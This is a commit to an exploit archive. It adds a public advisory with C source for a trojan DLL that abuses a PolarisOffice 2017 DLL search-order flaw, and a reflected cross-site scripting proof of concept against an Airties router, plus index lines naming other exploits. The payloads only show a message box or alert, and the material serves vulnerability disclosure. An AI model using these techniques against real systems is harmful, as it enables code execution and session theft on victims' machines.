DB: 2018-07-07

2 changes to exploits/shellcodes PolarisOffice 2017 8 - Remote Code Execution Airties AIR5444TT - Cross-Site Scripting
2018-07-07 05:01:49 +00:00 · 2018-07-07 05:01:49 +00:00 · 5e6d432161
commit 5e6d432161
parent 08110782dd
3 changed files with 138 additions and 0 deletions
--- a/exploits/windows/remote/44985.c
+++ b/exploits/windows/remote/44985.c
@ -0,0 +1,119 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/POLARISOFFICE-2017-v8-REMOTE-CODE-EXECUTION.txt
+[+] ISR: Apparition Security          
+ 
+
+Vendor:
+=============
+www.polarisoffice.com
+
+
+Product:
+===========
+PolarisOffice 2017 v8
+
+Polaris Document Solution is an integrated solution for corporate document life cycle from document creation, use, management, security, and collaboration.
+
+Used by more than 70 million subscribers in 240 countries.
+
+
+Vulnerability Type:
+===================
+Remote Code Execution
+
+
+CVE Reference:
+==============
+CVE-2018-12589
+
+
+Security Issue:
+================
+Polaris Office 2017 8.1 allows attackers to execute arbitrary code via a Trojan horse "puiframeworkproresenu.dll" file
+in the current working directory, due to a search order flaw vulnerability.
+
+1) create a 32bit DLL named "puiframeworkproresenu.dll" 
+2) put any .PDF or .PPTX file or whatever that is configured to open in Polaris Office in same directory as the above DLL 
+3) open the document (PDF etc) then BOOM our arbitrary DLL will execute on victims system.
+
+This can be observed as well with both the DLL and a document opened from a remote share.
+
+
+
+Exploit/POC:
+=============
+
+#include <windows.h>
+
+/* hyp3rlinx */
+
+/*
+gcc -c -m32 puiframeworkproresenu.c
+gcc -shared -m32 -o puiframeworkproresenu.dll puiframeworkproresenu.o
+*/
+
+void trojanizer(){
+	 MessageBox( 0, "Continue with PWNAGE?" , "philbin :)" , MB_YESNO + MB_ICONQUESTION );
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
+	switch(fdwReason){
+		case DLL_PROCESS_ATTACH:{
+			 trojanizer();
+			break;
+		}
+		case DLL_PROCESS_DETACH:{
+			 trojanizer();
+			break;
+		}
+		case DLL_THREAD_ATTACH:{
+			 trojanizer();
+			break;
+		}
+		case DLL_THREAD_DETACH:{
+			 trojanizer();
+			break;
+		}
+	}
+	
+	return TRUE;
+}
+
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: June 14, 2018
+Vendor confirms vulnerability : June 19, 2018
+Mitre assigned CVE : June 20, 2018
+Vendor replied fix will be in July
+however, update was released : June 23, 2018
+Notified vendor of impending advisory : June 23, 2018
+Vendor : "glad to hear that your problem has been solved"
+June 26, 2018 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
--- a/exploits/windows/webapps/44986.txt
+++ b/exploits/windows/webapps/44986.txt
@ -0,0 +1,17 @@
+# Exploit Title: Airties AIR5444TT - Cross-Site Scripting
+# Date: 2018-07-06 
+# Exploit Author: Raif Berkay Dincel
+# Vendor Homepage: airties.com 
+# Software [http://www.airties.com.tr/support/dcenter/]
+# Version: [1.0.0.18]
+# CVE-ID: CVE-2018-8738
+# Tested on: MacOS High Sierra / Linux Mint / Windows 10
+ 
+# Vulnerable Parameter Type: GET 
+# Vulnerable Parameter: 192.168.2.1/top.html?page=main&productboardtype= 
+ 
+# Proof of Concepts:
+ 
+192.168.2.1/top.html?page=main&productboardtype=<script>alert("Raif Berkay Dincel");</script>
+ 
+http://192.168.2.1/top.html?page=main&productboardtype=%3Cscript%3Ealert(%22Raif%20Berkay%20Dincel%22);%3C/script%3E
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -16598,6 +16598,7 @@ id,file,description,date,author,type,platform,port
 44941,exploits/windows/remote/44941.txt,"Foxit Reader 9.0.1.1049 - Remote Code Execution",2018-06-25,mr_me,remote,windows,
 44968,exploits/windows/remote/44968.rb,"FTPShell Client 6.70 (Enterprise Edition) - Stack Buffer Overflow (Metasploit)",2018-07-02,Metasploit,remote,windows,
 44969,exploits/linux/remote/44969.rb,"Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit)",2018-07-02,Metasploit,remote,linux,80
+44985,exploits/windows/remote/44985.c,"PolarisOffice 2017 8 - Remote Code Execution",2018-07-06,hyp3rlinx,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39627,3 +39628,4 @@ id,file,description,date,author,type,platform,port
 44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php,
 44978,exploits/php/webapps/44978.txt,"ShopNx - Arbitrary File Upload",2018-07-04,L0RD,webapps,php,
 44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80
+44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80